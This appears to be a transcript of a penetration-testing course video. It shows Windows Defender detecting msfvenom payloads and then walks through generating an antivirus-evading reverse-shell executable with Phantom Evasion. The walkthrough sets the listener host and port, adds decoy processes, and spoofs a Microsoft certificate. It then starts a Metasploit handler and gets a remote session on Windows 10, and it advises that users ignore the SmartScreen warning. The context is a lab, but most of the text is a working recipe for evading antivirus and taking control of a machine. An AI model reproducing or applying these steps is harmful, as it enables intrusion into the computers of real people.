MSF Venom is a really good tool when you're trying to generate payloads. It has a whole lot of features that allow you to play with many things in payloads. However, antivirus software companies constantly update their databases and detection mechanisms. As I said before, they can use artificial intelligence and machine learning, cloud computing, and many other technologies to improve their products because they're trying to sell them and make a profit. So that means MSF Venom payloads are pretty much always detected. I'd say, 85% of the time, mostly we'll say, they're detected by these improved technologies. But I want to show you something. So open Windows 10 and go to http 10.10.2.11.8000 to view our malware folder from a browser. Now, the 3 files that we created in the previous videos are here, so let's download them in order. Click on normal.exe and save. Whoa! Windows Defender detects this as a virus. It detects it even when I download it, but not when I launch? See, that's a big improvement. So the next file, download encoded.exe and say. So as you can see, while downloading, Defender scans the file. Okay, so that's detected as well. Let's have a look at the third file. Click it to download and save it. Defender's also scanning the file. Okay, unfortunately, it's also detected as a virus. So then let's go back to Kali. What do you think we should do at the moment? So the point I'm trying to make here is that antivirus software and payload generators are in competition. So today your payload can successfully execute on your targets and you can evade the antivirus software. But a few days go by and the same payload may be prevented to be executed and detected as malware. So then you need to find a new custom payload generator. So at the time I record this course, I'm looking for a custom payload generator. And I found one on GitHub. And you can use this one or find another one for yourself. Alrighty then. Let me show you first how to install this custom generator. So I'm going to use another Kali instance for a fresh install. So open up your browser and go to this GitHub address. Phantom Evasion is the name of this payload generator. So I'll download it as a zip file. Then open File Explorer and go to the download directory and extract it. And then you can cut or copy the extracted folder to the Evasion folder on the desktop. So here are the files in the Phantom folder. Close it up and open your terminal. So change the directory to Phantom folder like this. Then type chmod +x phantom evasion.py to make the file run by the current user. And then type python phantom evasion.py to start the installation. So the installation will take a really long time, but be patient. And as always, I'm not going to record the whole installation, you just wait for it. And we're back. After the installation, you will have this screen, which means you installed it perfectly. Now I'm going to go back to my Kali and go to Phantom folder, then run python phantom evasion.py. Now you can explore all the modules. There are many, many very useful ones. What I'm looking for is a stealthy Windows payload. So type 1. And it will be a stager, so type 2. Windows 10 box is 64-bit, so type 2. And then these are the payloads that Phantom Evasion provides for us. So I'm going to choose the fourth one. X64 Interpreter Reverse TCP. So this has a short but informative warning. And it also shows the required payload for the handler. So I'll press enter to continue. Provide lhost, which is 10.10.2.11. lport is 443. Then file name, Phantom, I think is a good name. Now it's good to add multiple processes behaviors. So type Y, insert 2 decoy processes, and striping the executable will also help. So type Y. It will sign the executable if you want. So yeah, I do. So type Y. So it'll spoof a Microsoft certificate and fill with notepad information. And then finally, the payload is generated. So the file is in the Phantom Evasion directory. And open up a new tab, ls. And if you're looking at what I'm looking at, you'll see the phantom.exe is right here. All right, move phantom.exe to root desktop malware. So I moved it here because I already have run the Python server from this folder. So now I'll go to the MSF console. Set payload to Windows x64 interpreter reverse TCP. Set lhost to 10.10.2.11 and set lport to 443. Show options to check, make sure everything's okay. And if there's no problem, then exploit J. Okay, so now open Windows 10 and open the download page for our executables. Refresh the page. Now download the phantom.exe and save it. Windows Defender is scanning the file. And just like that, it does not detect anything. So now open the download folder and double-click the file to launch it. Now you might think you are detected, but no. Click more info and you'll see why. Because Microsoft doesn't know the publisher of this executable. So it just warns us, which nobody really cares about this. You know it warns even for very well-known applications. So you can run it anyway. Most people do. Then go to Kali and open the MSF console tab. So here's a tip. Because you use the decoy processes and some other techniques applied to the payload as well, it's going to connect back, but it's going to take a bit. So just wait for it. Believe me, the session will open. Okay, it didn't prove me wrong. There it is, the session has opened. Hit enter and type session. So now you can interact with session 8. Type get UID, sysinfo, and congratulations, you have now evaded the Windows Defender on Windows 10 and got a interpreter session. Well done.